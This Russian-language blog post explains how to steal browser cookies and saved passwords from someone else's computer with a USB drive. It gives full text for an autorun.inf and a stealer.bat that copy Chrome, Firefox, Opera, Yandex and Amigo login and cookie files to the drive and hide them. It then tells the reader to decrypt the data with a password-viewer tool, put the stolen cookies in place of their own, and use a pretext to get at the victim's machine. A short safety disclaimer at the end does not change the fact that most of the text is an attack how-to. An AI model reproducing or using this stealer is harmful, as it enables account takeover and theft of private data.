Как угнать чужие Cookies файлы на флешку?

Cookies – зашифрованные текстовые документы, которые хранят основную информацию о пользователе, который использует браузер. Эта информация включает в себя статистику использования браузера, личные настройки, сохраненные логины и пароли и многое другое.

Взлом куки — это кража (или «угон») сессии посетителя веб-ресурса. Закрытая информация становится доступной не только отправителю и получателю, но и ещё третьему лицу — человеку осуществившему перехват.



Как это сделать

Создаем на флешке 2 текстовых файла. Первый называем “autorun.inf” а второй – “stealer.bat” *.bat – исполняемое расширение файла. Т.е. его можно использовать как программку*

В первый прописываем такие строчки:

[AutoRun]



Open=”stealer.bat”

Первый файл отвечает за автозапуск стиллера.

 

Второй – непосредственно сам стиллер. Его следует наполнить такими строчками:

@echo off 
md %~d0\Mozilla 
md %~d0\0pera 
md %~d0\Google 
md %~d0\Yandex 
md %~d0\Amigo
CD/D %APPDATA%\Opera\Opera\ 
cls
copy /y wand.dat %~d0\Opera\ 
copy /y cookies.dat %~d0\Opera\
cd %AppData%\Mozilla\Firefox\Profiles\*.default
copy /y cookies.sqlite %~d0\Mozilla
copy /y key3.db %~d0\Mozilla
copy /y signons.sqlite %~d0\Mozilla
copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla
cd %localappdata%\Google\Chrome\User Data\Default
cls
copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"
cd %localappdata%\Yandex\YandexBrowser\User Data\Default
copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex" 
cd %localappdata%\Amigo\User Data\Default
copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo" 
cls
ATTRIB -R -A -S -H 
attrib +h %~d0\Mozilla 
attrib +h %~d0\Opera 
attrib +h %~d0\Google 
attrib +h %~d0\Yandex 
attrib +h %~d0\Amigo 
attrib +h %~d0\search.bat 
attrib +h %~d0\new 
attrib +h %~d0\autorun.inf 
del: autorun.inf?

После этого “скрываем” получившиеся файлы. Свои куки на СВОЁМ компьютере удаляем, или скидываем на флешку. А на их место копируем полученные.

Теперь загрузите WebBrowserPassView. Можно использовать портативную версию. Нет необходимости нажимать на что-либо в этой программе: она загружает и расшифровывает файлы cookie из вашего браузера. Не забудьте заменить ваши файлы полученными!

В Windows 10 (и 8) наш авторан не сработает, там эта возможность банально отключена. Поэтому придется придумать способ получить доступ к компьютеру и ручками запустить файл stealer.bat, благо процесс занимает очень мало времени, а придумать предлог сесть на минуту за чужой компьютер много ума не надо.

Если вдруг кто не знает где храняться cookie, вот подсказка:

Google Chrome:

C:\Users\Пользователь\AppData\Local\Google\Chrome\User Data\Default (или Profile 1)\файл “Cookies” без расширения

Opera:

C:\Users\Пользователь\AppData\Roaming\Opera Software\Opera Stable\файл “Cookies”

Mozilla Firefox:

C:\Users\Пользователь\AppData\Roaming\Mozilla\Firefox\Profiles\qx1fqa6b.Default User\ файл “cookies.sqlite”

Internet Explorer 11:

C:\Users\Пользователь\AppData\Local\Microsoft\Windows\INetCookies\

C:\Users\Пользователь\AppData\Roaming\Microsoft\Windows\Cookies\

В дополнение

Хранение учетных данных в куках – не очень безопасный, но в то же время самый привычный и понятный способ для большинства неискушенных пользователей. Как и большинство я использую почти все основные варианты хранения учетных данных веб-сайтов:

  • Куки на ряде второстепенных сайтов, не связанных напрямую с моей личностью.
  • Менеджеры паролей браузеров там, где мне нужна синхронизация между устройствами, в т.ч. кросс-платформенная.
  • Локальный менеджер паролей KeePass под длинным мастер-паролем для самых важных учетных данных, компрометация которых может нанести удар по моей репутации или поставить под угрозу посетителей моих сайтов.
  • Аутентификацию с помощью аккаунтов соцсетей, причем в последнее время предпочитаю именно этот способ.

Так как целью этого поста не является кража чужих почтовых ящиков, логинов аккаунтов и других данных или получения доступа к ним, на этом повествование закончу. Но с помощью специальных программ и социальной инженерии можно подменить свои cookies на чужие и получить доступ к чужим личным данным. В общем если злоумышленник загорится целью, то он найдет применение полученной информации.

Теперь вы знаете как могут украсть ваши пароли и логины. Будьте осторожны и не подпускайте к своиму компьютеру чужих людей.

 

 

Источник: https://hacker-basement.ru/

RuCoreNET - лучшее для вас!


Поделись статьей с друзьями


42 просмотров


0 0 vote
Рейтинг статьи
Подписаться
Уведомление о
guest
0 Комментарий
Inline Feedbacks
View all comments


Do NOT follow this link or you will be banned from the site!
0
Would love your thoughts, please comment.x
()
x

Сообщить об опечатке

Текст, который будет отправлен нашим редакторам: